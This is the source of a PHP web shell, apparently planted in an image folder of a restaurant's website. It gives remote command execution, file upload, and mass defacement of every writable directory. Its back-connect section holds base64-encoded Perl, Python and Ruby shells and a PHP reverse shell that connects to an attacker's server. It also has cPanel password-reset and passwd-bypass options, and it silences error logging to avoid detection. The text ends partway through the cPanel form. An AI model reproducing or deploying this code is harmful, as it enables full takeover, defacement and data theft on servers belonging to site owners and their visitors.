xnu73r_root Shell
: /home/mahabakery/domains/mahaabakeryrestaurant.com/public_html/MhAkFlkhdDFkjhdf/img/ [ drwxr-xr-x ]
<?php
// copyright : xnu73r_root
// author : xnu73r_root
set_time_limit(0);
error_reporting(0);
@ini_set('error_log', null);
@ini_set('log_errors', 0);
@ini_set('max_execution_time', 0);
@ini_set('output_buffering', 0);
@ini_set('display_errors', 0);
date_default_timezone_set('Asia/Jakarta');
$author = "xnu73r_root";
function ▟($dir, $p)
{
if (isset($_GET['path'])) {
$▚ = $_GET['path'];
} else {
$▚ = getcwd();
}
if (is_writable($▚)) {
return "<gr>" . $p . "</gr>";
} else {
return "<rd>" . $p . "</rd>";
}
}
function swall($swa, $text, $dir)
{
echo "<script>Swal.fire({
title: '$swa',
text: '$text',
type: '$swa',
}).then((value) => {window.location='?dir=$dir';})</script>";
}
function exe($cmd)
{
if (function_exists('system')) {
@ob_start();
@system($cmd);
$buff = @ob_get_contents();
@ob_end_clean();
return $buff;
}
}
function ok()
{
echo '<div class="alert alert-success alert-dismissible fade show my-3" role="alert"><button type="button" class="btn-close" data-bs-dismiss="alert" aria-label="Close"></button>';
}
function er()
{
echo '<div class="alert alert-danger alert-dismissible fade show my-3" role="alert"><button type="button" class="btn-close" data-bs-dismiss="alert" aria-label="Close"></button>';
}
function sz($byt)
{
$sz = array('B', 'KB', 'MB', 'GB', 'TB');
for ($i = 0; $byt >= 1024 && $i < (count($sz) - 1); $byt /= 1024, $i++);
return (round($byt, 2) . " " . $sz[$i]);
}
function ip()
{
$ipas = '';
if (getenv('HTTP_CLIENT_IP'))
$ipas = getenv('HTTP_CLIENT_IP');
else if (getenv('HTTP_X_FORWARDED_FOR'))
$ipas = getenv('HTTP_X_FORWARDED_FOR');
else if (getenv('HTTP_X_FORWARDED'))
$ipas = getenv('HTTP_X_FORWARDED');
else if (getenv('HTTP_FORWARDED_FOR'))
$ipas = getenv('HTTP_FORWARDED_FOR');
else if (getenv('HTTP_FORWARDED'))
$ipas = getenv('HTTP_FORWARDED');
else if (getenv('REMOTE_ADDR'))
$ipas = getenv('REMOTE_ADDR');
else
$ipas = 'IP tidak dikenali';
return $ipas;
}
function p($file)
{
if ($p = @fileperms($file)) {
$i = 'u';
if (($p & 0xC000) == 0xC000) $i = 's';
elseif (($p & 0xA000) == 0xA000) $i = 'l';
elseif (($p & 0x8000) == 0x8000) $i = '-';
elseif (($p & 0x6000) == 0x6000) $i = 'b';
elseif (($p & 0x4000) == 0x4000) $i = 'd';
elseif (($p & 0x2000) == 0x2000) $i = 'c';
elseif (($p & 0x1000) == 0x1000) $i = 'p';
$i .= ($p & 00400) ? 'r' : '-';
$i .= ($p & 00200) ? 'w' : '-';
$i .= ($p & 00100) ? 'x' : '-';
$i .= ($p & 00040) ? 'r' : '-';
$i .= ($p & 00020) ? 'w' : '-';
$i .= ($p & 00010) ? 'x' : '-';
$i .= ($p & 00004) ? 'r' : '-';
$i .= ($p & 00002) ? 'w' : '-';
$i .= ($p & 00001) ? 'x' : '-';
return $i;
} else return "- ?? -";
}
echo "<!DOCTYPE HTML>
<html>
<head>
<meta name='author' content='$author'>
<meta name='robots' content='noindex,nofollow'>
<title>" . $_SERVER['HTTP_HOST'] . " - $author</title>
<meta name='viewport' content='width=device-width, initial-scale=0.70'>
<link rel='stylesheet' href='//random-php.ftp.sh/style.css'>
<script src='//cdnjs.cloudflare.com/ajax/libs/prism/1.6.0/prism.js'></script>
<script src='//cdn.jsdelivr.net/npm/bootstrap@5.0.1/dist/js/bootstrap.bundle.min.js'></script>
<script src='//code.jquery.com/jquery-3.3.1.slim.min.js'></script>
<link rel='stylesheet' href='https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.10.2/css/all.min.css'/>
<link href='http://fonts.googleapis.com/css?family=New+Rocker' rel='stylesheet' type='text/css'>
</head>
<style>
body,button,a,div,input,textarea {
font-family: 'New Rocker';
font-style: normal;
color:black;
text-shadow: 0 0 3px #008000, 0px 0px 5px #008000,0 0 5px #008000,0 0 5px #008000;
}
.dex ,gr, {
color:white;
text-shadow: 0 0 3px #008000, 0px 0px 5px #008000,0 0 5px #008000,0 0 5px #008000;
}
span {
color:#fff;
text-shadow: 0 0 3px #008000, 0px 0px 5px #008000,0 0 5px #008000,0 0 5px #008000;
}
.shell {
border-radius: 4px;
border: 1px solid rgba(255, 255, 255, 0.4);
font-size: 10pt;
display: flex;
flex-direction: column;
align-items: stretch;
background: #242424;
color: #fff;
}
.pre {
height: 500px;
overflow: auto;
white-space: pre-wrap;
flex-grow: 1;
margin:10px auto;
padding:10px;
line-height:1.3em;
overflow-x:scroll;
}
</style>
<body class='bg-secondary text-light'>
<div class='container-fluid'>
<div class='py-3' id='main'>
<div class='box shadow bg-dark p-4 rounded-3'>
<a class='text-decoration-none text-light' href='" . $_SERVER['PHP_SELF'] . "'><center><h4>$author Shell</h4></center></a>";
if (isset($_GET['path'])) {
$path = $_GET['path'];
} else {
$path = getcwd();
}
$path = str_replace('\\', '/', $path);
$paths = explode('/', $path);
foreach ($paths as $id => $pat) {
if ($pat == '' && $id == 0) {
$a = true;
echo '<div class="table-responsive"><i class="bi bi-hdd-rack"></i> : <a class="text-decoration-none text-light" href="?path=/">/</a>';
continue;
}
if ($pat == '') continue;
echo '<a class="dex" href="?path=';
for ($i = 0; $i <= $id; $i++) {
echo "$paths[$i]";
if ($i != $id) echo "/";
}
echo '">' . $pat . '</a>/';
}
echo " <span class='dex'>[ " . ▟($path, p($path)) . " ]</span></div>";
echo "
</div>
</div>
</div>
<div class='container-fluid'>
<div class='box shadow bg-dark p-4 rounded-3'>
<div class='text-center'>
<a class='btn btn-outline-light btn-sm' href='?id=upload&path=$path'><i class='bi bi-upload'></i> upload</a>
<a class='btn btn-outline-light btn-sm' href='?id=deface&path=$path'><i class='bi bi-exclamation-diamond'></i> mass deface</a>
<a class='btn btn-outline-light btn-sm' href='?id=delete&path=$path'><i class='bi bi-trash'></i> mass delete</a>
<a class='btn btn-outline-light btn-sm' href='?id=cmd&path=$path'><i class='bi bi-terminal'></i> console</a>
<a class='btn btn-outline-light btn-sm' href='?id=info&path=$path'><i class='bi bi-info-circle'></i> info server</a>
<a class='btn btn-outline-light btn-sm' href='?id=backconect&path=$path'><i class='fa fa-network-wired'></i> back conect</a>
<a class='btn btn-outline-light btn-sm' href='?id=bypass&path=$path'><i class='fa fa-exclamation-circle'></i> bypass etc/passwd</a>
<a class='btn btn-outline-light btn-sm' href='?id=cpanel&path=$path'><i class='fa fa-key'></i> reset cpanel</a>
</div>";
// tools nya
if (isset($_GET['path'])) {
$dir = $_GET['path'];
chdir($dir);
} else {
$dir = getcwd();
}
$dir = str_replace("\\", "/", $dir);
$scdir = explode("/", $dir);
for ($i = 0; $i <= $c_dir; $i++) {
$scdir[$i];
if ($i != $c_dir) {
} elseif ($_GET['id'] == 'deface') {
echo "$_s";
function mass_kabeh($dir, $namafile, $isi_script)
{
if (is_writable($dir)) {
$dira = scandir($dir);
foreach ($dira as $dirb) {
$dirc = "$dir/$dirb";
$▚ = $dirc . '/' . $namafile;
if ($dirb === '.') {
file_put_contents($▚, $isi_script);
} elseif ($dirb === '..') {
file_put_contents($▚, $isi_script);
} else {
if (is_dir($dirc)) {
if (is_writable($dirc)) {
echo "[<gr><i class='bi bi-check-all'></i></gr>] $▚<br>";
file_put_contents($▚, $isi_script);
$▟ = mass_kabeh($dirc, $namafile, $isi_script);
}
}
}
}
}
}
function mass_biasa($dir, $namafile, $isi_script)
{
if (is_writable($dir)) {
$dira = scandir($dir);
foreach ($dira as $dirb) {
$dirc = "$dir/$dirb";
$▚ = $dirc . '/' . $namafile;
if ($dirb === '.') {
file_put_contents($▚, $isi_script);
} elseif ($dirb === '..') {
file_put_contents($▚, $isi_script);
} else {
if (is_dir($dirc)) {
if (is_writable($dirc)) {
echo "[<gr><i class='bi bi-check-all'></i></gr>] $dirb/$namafile<br>";
file_put_contents($▚, $isi_script);
}
}
}
}
}
}
if ($_POST['start']) {
if ($_POST['tipe'] == 'massal') {
mass_kabeh($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
} elseif ($_POST['tipe'] == 'biasa') {
mass_biasa($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
}
echo "<br>";
}
echo "
<div class='card text-dark bg-dark'>
<div class='card-header'>
<form method='POST'>
<kbd>$_x Mass deface</kbd>
<br>Tipe:<br>
<div class='custom-control custom-switch'>
<input class='custom-control-input' type='checkbox' id='customSwitch' name='tipe' value='biasa'>
<label class='custom-control-label' for='customSwitch'>Biasa</label>
</div>
<div class='custom-control custom-switch'>
<input class='custom-control-input' type='checkbox' id='customSwitch1' name='tipe' value='massal'>
<label class='custom-control-label' for='customSwitch1'>Massal</label>
</div>
<i class='bi bi-folder'></i> Lokasi:
<input class='form-control btn-sm' type='text' name='d_dir' value='$dir'>
<i class='bi bi-file-earmark'></i> Nama file:
<input class='form-control btn-sm' type='text' name='d_file' placeholder='nama file' $_r>
<i class='bi bi-file-earmark'></i> Isi file:
<textarea class='form-control btn-sm' rows='7' name='script' placeholder='isi file' $_r></textarea>
<input class='btn btn-dark btn-sm btn-block' type='submit' name='start' value='mass deface'>
</form>
</div>
</div>
<br>";
} elseif ($_GET['id'] == 'cmd') {
if ($_POST['ekseCMD']) {
$cmd = $_POST['ekseCMD'];
}
echo "$_s
<div class='card text-dark bg-dark'>
<div class='card-header'>
<kbd>$_x Console</kbd>
<div class='container-fluid language-javascript'>
<pre style='font-size:10px;'><gr>~</gr>$ <rd>$cmd</rd><br><code>";
system($_POST['ekseCMD'] . ' 2>&1');
echo "</code></pre>
</div>
<form method='POST'>
<div class='input-group mb-3'>
<input class='form-control btn-sm' type='text' name='ekseCMD' value='$cmd' placeholder='whoami' $_r>
<button class='btn btn-dark btn-sm' type='sumbit'><i class='bi bi-arrow-return-right'></i></button>
</div>
</form>
</div>
</div>
<br>";
} elseif ($_GET['id'] == 'info') {
$disfunc = @ini_get("disable_functions");
if (empty($disfunc)) {
$disfc = "<gr>NONE</gr>";
} else {
$disfc = "<rd>$disfunc</rd>";
}
if (!function_exists('posix_getegid')) {
$user = @get_current_user();
$uid = @getmyuid();
$gid = @getmygid();
$group = "?";
} else {
$uid = @posix_getpwuid(posix_geteuid());
$gid = @posix_getgrgid(posix_getegid());
$user = $uid['name'];
$uid = $uid['uid'];
$group = $gid['name'];
$gid = $gid['gid'];
}
$mysql = (function_exists('mysqli_connect')) ? '<font color=green>ON</font>' : '<font color=red>OFF</font>';
$curl = (function_exists('curl_version')) ? '<font color=green>ON</font>' : '<font color=red>OFF</font>';
$mail = (function_exists('mail')) ? '<font color=green>ON</font>' : '<font color=red>OFF</font>';
$sm = (@ini_get(strtolower("safe_mode")) == 'on') ? "<rd>ON</rd>" : "<gr>OFF</gr>";
echo "$_s
<div class='card text-dark bg-dark'>
<div class='card-header'>
<kbd>$_x Info server</kbd>
<br>
Uname: <gr>" . php_uname() . "</gr><br />
Software: <gr>" . $_SERVER['SERVER_SOFTWARE'] . "</gr><br />
PHP version: <gr>" . PHP_VERSION . "</gr> <a class='text-decoration-none' href='?id=phpinfo&path=$path'>[ PHP INFO ]</a> PHP os: <gr>" . PHP_OS . "</gr><br />
Server Ip: <gr>" . gethostbyname($_SERVER['HTTP_HOST']) . "</gr><br />
Your Ip: <gr>" . ip() . "</gr><br />
User: <gr>$user</gr> ($uid) | Group: <gr>$group</gr> ($gid)<br />
Safe Mode: $sm<br />
Mysqli : <span>$mysql</span><br />
Curl : <span>$curl </span><br />
Mail : <span>$mail</span><br />
<kbd>Disable Function:</kbd><pre>$disfc</pre>
</div>
</div>
<br>";
} elseif ($_GET['id'] == 'phpinfo') {
@ob_start();
@eval("phpinfo();");
$buff = @ob_get_contents();
@ob_end_clean();
$awal = strpos($buff, "<body>") + 6;
$akhir = strpos($buff, "</body>");
echo "<pre class='php_info'>" . substr($buff, $awal, $akhir - $awal) . "</pre>";
exit;
} elseif ($_GET['id'] == 'upload') {
echo "$_s
<div class='card text-dark bg-dark'>
<div class='card-header'>";
if (isset($_FILES['file'])) {
if (copy($_FILES['file']['tmp_name'], $path . '/' . $_FILES['file']['name'])) {
echo '<strong>Upload</strong> ok! ' . ok() . '</div>';
} else {
echo '<strong>Upload</strong> gagal! ' . er() . '</div>';
}
}
echo "
<form method='POST' enctype='multipart/form-data'>
<kbd>$_x Upload File</kbd>
<div class='input-group mb-3'>
<input class='form-control form-control-sm' type='file' name='file' $_r>
<button class='btn btn-dark btn-sm' type='submit'><i class='bi bi-arrow-return-right'></i></button>
</div>
</form>
</div>
</div>
<br>";
} elseif ($_GET['id'] == 'filebaru') {
echo "$_s";
if (isset($_POST['bikin'])) {
$name = $_POST['nama_file'];
$isi_file = $_POST['isi_file'];
foreach ($name as $nama_file) {
$handle = @fopen("$nama_file", "w");
if ($isi_file) {
$buat = @fwrite($handle, $isi_file);
} else {
$buat = $handle;
}
}
if ($buat) {
echo '<strong>Buat file</strong> ok! ' . ok() . '</div>';
} else {
echo '<strong>Buat file</strong> gagal! ' . er() . '</div>';
}
}
echo "
<div class='card text-dark'>
<div class='card-header'>
<kbd>$_x Buat file</kbd>
<form method='POST'>
<i class='bi bi-file-earmark'></i> Nama file:
<input class='form-control form-control-sm' type='text' name='nama_file[]' placeholder='Nama file' $_r>
<i class='bi bi-file-earmark'></i> Isi file:
<textarea class='form-control form-control-sm' name='isi_file' rows='7' placeholder='Isi file' $_r ></textarea>
<input class='btn btn-dark btn-sm btn-block' type='submit' name='bikin' value='buat'>
</form>
</div>
</div>
<br>";
} elseif ($_GET['id'] == 'dirbaru') {
echo "$_s";
if (isset($_POST['buat'])) {
$nama = $_POST['nama_dir'];
foreach ($nama as $nama_dir) {
$folder = preg_replace("([^\w\s\d\-_~,;:\[\]\(\].]|[\.]{2,})", '', $nama_dir);
$fd = @mkdir($folder);
}
if ($fd) {
echo '<strong>Buat dir</strong> ok! ' . ok() . '</div>';
} else {
echo '<strong>Buat dir</strong> gagal! ' . er() . '</div>';
}
}
echo "
<div class='card text-dark'>
<div class='card-header'>
<kbd>$_x Buat dir</kbd>
<form method='POST'>
<i class='bi bi-folder'></i> Nama dir:
<div class='input-group mb-3'>
<input class='form-control form-control-sm' type='text' name='nama_dir[]' placeholder='Nama dir' $_r>
<input class='btn btn-dark btn-sm' type='submit' name='buat' value='buat'>
</div>
</form>
</div>
</div>
<br>";
} elseif ($_GET['id'] == 'backconect') {
echo "
<br /><form method='post'>
<div class='card text-dark bg-dark'>
<div class='card-header'>
<span>Bind port to /bin/sh [Perl]</span><br/>
<label>Port :</label>
<div class='form-group input-group mb-4'>
<input type='text' name='port' class='form-control' value='6969'>
<input type='submit' name='bpl' class='btn btn-dark form-control' value='Reserve'>
</div>
<h5>Back-Connect</h5>
<label>Server :</label>
<input type='text' name='server' class='form-control mb-3' placeholder='" . $_SERVER['REMOTE_ADDR'] . "'>
<label>Port :</label>
<div class='form-group input-group mb-4'>
<input type='text' name='port' class='form-control' placeholder='443'>
<select class='form-control' name='backconnect'>
<option value='perl'>Perl</option>
<option value='php'>PHP</option>
<option value='python'>Python</option>
<option value='ruby'>Ruby</option>
</select>
</div>
<input type='submit' class='btn btn-dark btn-block' value='Connect'>
</div>
</div>
</form>";
function bcTool($dir, $file)
{
bcTool($dir, $file);
if ($_POST['bpl']) {
$bp = base64_decode('IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=');
$brt = @fopen('bp.pl', 'w');
fwrite($brt, $bp);
$out = exe('perl bp.pl ' . $_POST['port'] . ' 1>/dev/null 2>&1 &');
sleep(1);
echo "<pre class='text-light'>$out\n" . exe('ps aux | grep bp.pl') . '</pre>';
unlink('bp.pl');
}
if ($_POST['backconnect'] == 'perl') {
$bc = base64_decode('IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7');
$plbc = @fopen('bc.pl', 'w');
fwrite($plbc, $bc);
$out = exe('perl bc.pl ' . $_POST['server'] . ' ' . $_POST['port'] . ' 1>/dev/null 2>&1 &');
sleep(1);
echo "<pre class='text-light'>$out\n" . exe('ps aux | grep bc.pl') . '</pre>';
unlink('bc.pl');
}
if ($_POST['backconnect'] == 'python') {
$becaa = base64_decode('IyEvdXNyL2Jpbi9weXRob24NCiNVc2FnZTogcHl0aG9uIGZpbGVuYW1lLnB5IEhPU1QgUE9SVA0KaW1wb3J0IHN5cywgc29ja2V0LCBvcywgc3VicHJvY2Vzcw0KaXBsbyA9IHN5cy5hcmd2WzFdDQpwb3J0bG8gPSBpbnQoc3lzLmFyZ3ZbMl0pDQpzb2NrZXQuc2V0ZGVmYXVsdHRpbWVvdXQoNjApDQpkZWYgcHliYWNrY29ubmVjdCgpOg0KICB0cnk6DQogICAgam1iID0gc29ja2V0LnNvY2tldChzb2NrZXQuQUZfSU5FVCxzb2NrZXQuU09DS19TVFJFQU0pDQogICAgam1iLmNvbm5lY3QoKGlwbG8scG9ydGxvKSkNCiAgICBqbWIuc2VuZCgnJydcblB5dGhvbiBCYWNrQ29ubmVjdCBCeSBNci54QmFyYWt1ZGFcblRoYW5rcyBHb29nbGUgRm9yIFJlZmVyZW5zaVxuXG4nJycpDQogICAgb3MuZHVwMihqbWIuZmlsZW5vKCksMCkNCiAgICBvcy5kdXAyKGptYi5maWxlbm8oKSwxKQ0KICAgIG9zLmR1cDIoam1iLmZpbGVubygpLDIpDQogICAgb3MuZHVwMihqbWIuZmlsZW5vKCksMykNCiAgICBzaGVsbCA9IHN1YnByb2Nlc3MuY2FsbChbIi9iaW4vc2giLCItaSJdKQ0KICBleGNlcHQgc29ja2V0LnRpbWVvdXQ6DQogICAgcHJpbnQgIlRpbU91dCINCiAgZXhjZXB0IHNvY2tldC5lcnJvciwgZToNCiAgICBwcmludCAiRXJyb3IiLCBlDQpweWJhY2tjb25uZWN0KCk=');
$pbcaa = @fopen('bcpyt.py', 'w');
fwrite($pbcaa, $becaa);
$out1 = exe('python bcpyt.py ' . $_POST['server'] . ' ' . $_POST['port']);
sleep(1);
echo "<pre class='text-light'>$out1\n" . exe('ps aux | grep bcpyt.py') . '</pre>';
unlink('bcpyt.py');
}
if ($_POST['backconnect'] == 'ruby') {
$becaak = base64_decode('IyEvdXNyL2Jpbi9lbnYgcnVieQ0KIyBkZXZpbHpjMGRlLm9yZyAoYykgMjAxMg0KIw0KIyBiaW5kIGFuZCByZXZlcnNlIHNoZWxsDQojIGIzNzRrDQpyZXF1aXJlICdzb2NrZXQnDQpyZXF1aXJlICdwYXRobmFtZScNCg0KZGVmIHVzYWdlDQoJcHJpbnQgImJpbmQgOlxyXG4gIHJ1YnkgIiArIEZpbGUuYmFzZW5hbWUoX19GSUxFX18pICsgIiBbcG9ydF1cclxuIg0KCXByaW50ICJyZXZlcnNlIDpcclxuICBydWJ5ICIgKyBGaWxlLmJhc2VuYW1lKF9fRklMRV9fKSArICIgW3BvcnRdIFtob3N0XVxyXG4iDQplbmQNCg0KZGVmIHN1Y2tzDQoJc3Vja3MgPSBmYWxzZQ0KCWlmIFJVQllfUExBVEZPUk0uZG93bmNhc2UubWF0Y2goJ21zd2lufHdpbnxtaW5ndycpDQoJCXN1Y2tzID0gdHJ1ZQ0KCWVuZA0KCXJldHVybiBzdWNrcw0KZW5kDQoNCmRlZiByZWFscGF0aChzdHIpDQoJcmVhbCA9IHN0cg0KCWlmIEZpbGUuZXhpc3RzPyhzdHIpDQoJCWQgPSBQYXRobmFtZS5uZXcoc3RyKQ0KCQlyZWFsID0gZC5yZWFscGF0aC50b19zDQoJZW5kDQoJaWYgc3Vja3MNCgkJcmVhbCA9IHJlYWwuZ3N1YigvXC8vLCJcXCIpDQoJZW5kDQoJcmV0dXJuIHJlYWwNCmVuZA0KDQppZiBBUkdWLmxlbmd0aCA9PSAxDQoJaWYgQVJHVlswXSA9fiAvXlswLTldezEsNX0kLw0KCQlwb3J0ID0gSW50ZWdlcihBUkdWWzBdKQ0KCWVsc2UNCgkJdXNhZ2UNCgkJcHJpbnQgIlxyXG4qKiogZXJyb3IgOiBQbGVhc2UgaW5wdXQgYSB2YWxpZCBwb3J0XHJcbiINCgkJZXhpdA0KCWVuZA0KCXNlcnZlciA9IFRDUFNlcnZlci5uZXcoIiIsIHBvcnQpDQoJcyA9IHNlcnZlci5hY2NlcHQNCglwb3J0ID0gcy5wZWVyYWRkclsxXQ0KCW5hbWUgPSBzLnBlZXJhZGRyWzJdDQoJcy5wcmludCAiKioqIGNvbm5lY3RlZFxyXG4iDQoJcHV0cyAiKioqIGNvbm5lY3RlZCA6ICN7bmFtZX06I3twb3J0fVxyXG4iDQoJYmVnaW4NCgkJaWYgbm90IHN1Y2tzDQoJCQlmID0gcy50b19pDQoJCQlleGVjIHNwcmludGYoIi9iaW4vc2ggLWkgXDxcJiVkIFw+XCYlZCAyXD5cJiVkIixmLGYsZikNCgkJZWxzZQ0KCQkJcy5wcmludCAiXHJcbiIgKyByZWFscGF0aCgiLiIpICsgIj4iDQoJCQl3aGlsZSBsaW5lID0gcy5nZXRzDQoJCQkJcmFpc2UgZXJyb3JCcm8gaWYgbGluZSA9fiAvXmRpZVxyPyQvDQoJCQkJaWYgbm90IGxpbmUuY2hvbXAgPT0gIiINCgkJCQkJaWYgbGluZSA9fiAvY2QgLiovaQ0KCQkJCQkJbGluZSA9IGxpbmUuZ3N1YigvY2QgL2ksICcnKS5jaG9tcA0KCQkJCQkJaWYgRmlsZS5kaXJlY3Rvcnk/KGxpbmUpDQoJCQkJCQkJbGluZSA9IHJlYWxwYXRoKGxpbmUpDQoJCQkJCQkJRGlyLmNoZGlyKGxpbmUpDQoJCQkJCQllbmQNCgkJCQkJCXMucHJpbnQgIlxyXG4iICsgcmVhbHBhdGgoIi4iKSArICI+Ig0KCQkJCQllbHNpZiBsaW5lID1+IC9cdzouKi9pDQoJCQkJCQlpZiBGaWxlLmRpcmVjdG9yeT8obGluZS5jaG9tcCkNCgkJCQkJCQlEaXIuY2hkaXIobGluZS5jaG9tcCkNCgkJCQkJCWVuZA0KCQkJCQkJcy5wcmludCAiXHJcbiIgKyByZWFscGF0aCgiLiIpICsgIj4iDQoJCQkJCWVsc2UNCgkJCQkJCUlPLnBvcGVuKGxpbmUsInIiKXt8aW98cy5wcmludCBpby5yZWFkICsgIlxyXG4iICsgcmVhbHBhdGgoIi4iKSArICI+In0NCgkJCQkJZW5kDQoJCQkJZW5kDQoJCQllbmQNCgkJZW5kDQoJcmVzY3VlIGVycm9yQnJvDQoJCXB1dHMgIioqKiAje25hbWV9OiN7cG9ydH0gZGlzY29ubmVjdGVkIg0KCWVuc3VyZQ0KCQlzLmNsb3NlDQoJCXMgPSBuaWwNCgllbmQNCmVsc2lmIEFSR1YubGVuZ3RoID09IDINCglpZiBBUkdWWzBdID1+IC9eWzAtOV17MSw1fSQvDQoJCXBvcnQgPSBJbnRlZ2VyKEFSR1ZbMF0pDQoJCWhvc3QgPSBBUkdWWzFdDQoJZWxzaWYgQVJHVlsxXSA9fiAvXlswLTldezEsNX0kLw0KCQlwb3J0ID0gSW50ZWdlcihBUkdWWzFdKQ0KCQlob3N0ID0gQVJHVlswXQ0KCWVsc2UNCgkJdXNhZ2UNCgkJcHJpbnQgIlxyXG4qKiogZXJyb3IgOiBQbGVhc2UgaW5wdXQgYSB2YWxpZCBwb3J0XHJcbiINCgkJZXhpdA0KCWVuZA0KCXMgPSBUQ1BTb2NrZXQubmV3KCIje2hvc3R9IiwgcG9ydCkNCglwb3J0ID0gcy5wZWVyYWRkclsxXQ0KCW5hbWUgPSBzLnBlZXJhZGRyWzJdDQoJcy5wcmludCAiKioqIGNvbm5lY3RlZFxyXG4iDQoJcHV0cyAiKioqIGNvbm5lY3RlZCA6ICN7bmFtZX06I3twb3J0fSINCgliZWdpbg0KCQlpZiBub3Qgc3Vja3MNCgkJCWYgPSBzLnRvX2kNCgkJCWV4ZWMgc3ByaW50ZigiL2Jpbi9zaCAtaSBcPFwmJWQgXD5cJiVkIDJcPlwmJWQiLCBmLCBmLCBmKQ0KCQllbHNlDQoJCQlzLnByaW50ICJcclxuIiArIHJlYWxwYXRoKCIuIikgKyAiPiINCgkJCXdoaWxlIGxpbmUgPSBzLmdldHMNCgkJCQlyYWlzZSBlcnJvckJybyBpZiBsaW5lID1+IC9eZGllXHI/JC8NCgkJCQlpZiBub3QgbGluZS5jaG9tcCA9PSAiIg0KCQkJCQlpZiBsaW5lID1+IC9jZCAuKi9pDQoJCQkJCQlsaW5lID0gbGluZS5nc3ViKC9jZCAvaSwgJycpLmNob21wDQoJCQkJCQlpZiBGaWxlLmRpcmVjdG9yeT8obGluZSkNCgkJCQkJCQlsaW5lID0gcmVhbHBhdGgobGluZSkNCgkJCQkJCQlEaXIuY2hkaXIobGluZSkNCgkJCQkJCWVuZA0KCQkJCQkJcy5wcmludCAiXHJcbiIgKyByZWFscGF0aCgiLiIpICsgIj4iDQoJCQkJCWVsc2lmIGxpbmUgPX4gL1x3Oi4qL2kNCgkJCQkJCWlmIEZpbGUuZGlyZWN0b3J5PyhsaW5lLmNob21wKQ0KCQkJCQkJCURpci5jaGRpcihsaW5lLmNob21wKQ0KCQkJCQkJZW5kDQoJCQkJCQlzLnByaW50ICJcclxuIiArIHJlYWxwYXRoKCIuIikgKyAiPiINCgkJCQkJZWxzZQ0KCQkJCQkJSU8ucG9wZW4obGluZSwiciIpe3xpb3xzLnByaW50IGlvLnJlYWQgKyAiXHJcbiIgKyByZWFscGF0aCgiLiIpICsgIj4ifQ0KCQkJCQllbmQNCgkJCQllbmQNCgkJCWVuZA0KCQllbmQNCglyZXNjdWUgZXJyb3JCcm8NCgkJcHV0cyAiKioqICN7bmFtZX06I3twb3J0fSBkaXNjb25uZWN0ZWQiDQoJZW5zdXJlDQoJCXMuY2xvc2UNCgkJcyA9IG5pbA0KCWVuZA0KZWxzZQ0KCXVzYWdlDQoJZXhpdA0KZW5k');
$pbcaak = @fopen('bcruby.rb', 'w');
fwrite($pbcaak, $becaak);
$out2 = exe('ruby bcruby.rb ' . $_POST['server'] . ' ' . $_POST['port']);
sleep(1);
echo "<pre class='text-light'>$out2\n" . exe('ps aux | grep bcruby.rb') . '</pre>';
unlink('bcruby.rb');
}
if ($_POST['backconnect'] == 'php') {
$ip = $_POST['server'];
$port = $_POST['port'];
$sockfd = fsockopen($ip, $port, $errno, $errstr);
if ($errno != 0) {
echo "<font color='red'>$errno : $errstr</font>";
} elseif (!$sockfd) {
$result = '<p>Unexpected error has occured, connection may have failed.</p>';
} else {
fwrite($sockfd, "
\n{#######################################}
\n..:: BackConnect PHP By Con7ext ::..
\n{#######################################}\n");
$dir = @shell_exec('pwd');
$sysinfo = @shell_exec('uname -a');
$time = @shell_exec('time');
$len = 1337;
fwrite($sockfd, 'User ', $sysinfo, 'connected @ ', $time, "\n\n");
while (!feof($sockfd)) {
$cmdPrompt = '[kuda]#:> ';
@fwrite($sockfd, $cmdPrompt);
$command = fgets($sockfd, $len);
@fwrite($sockfd, "\n" . @shell_exec($command) . "\n\n");
}
@fclose($sockfd);
}
}
}
} elseif ($_GET['id'] == 'cpanel') {
echo '<br/><p class="text-center"><i class="fa fa-key"></i> Auto Reset Password Cpanel</p>
<form method="POST">
<div class="input-group mb-3">
